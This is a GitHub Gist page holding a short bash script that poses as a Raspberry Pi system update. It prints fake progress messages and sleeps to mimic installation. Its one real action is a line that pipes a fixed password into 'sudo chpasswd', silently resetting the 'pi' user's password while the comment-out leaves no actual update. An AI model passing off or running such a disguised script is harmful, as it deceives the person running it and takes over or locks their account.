Skip to content

Instantly share code, notes, and snippets.

#!bin/bash
echo " RaspberryPi system update now installing...
If prompted please enter password for user 'pi@127.0.0.1'"
echo "pi:raspberriepie" | sudo chpasswd
echo "Checking update systems..."
echo "Installing sys-lib2"
sleep 3;
# apt-get dist -s sys-lib2
echo "Done!"
echo "Installing PIXEL-latest"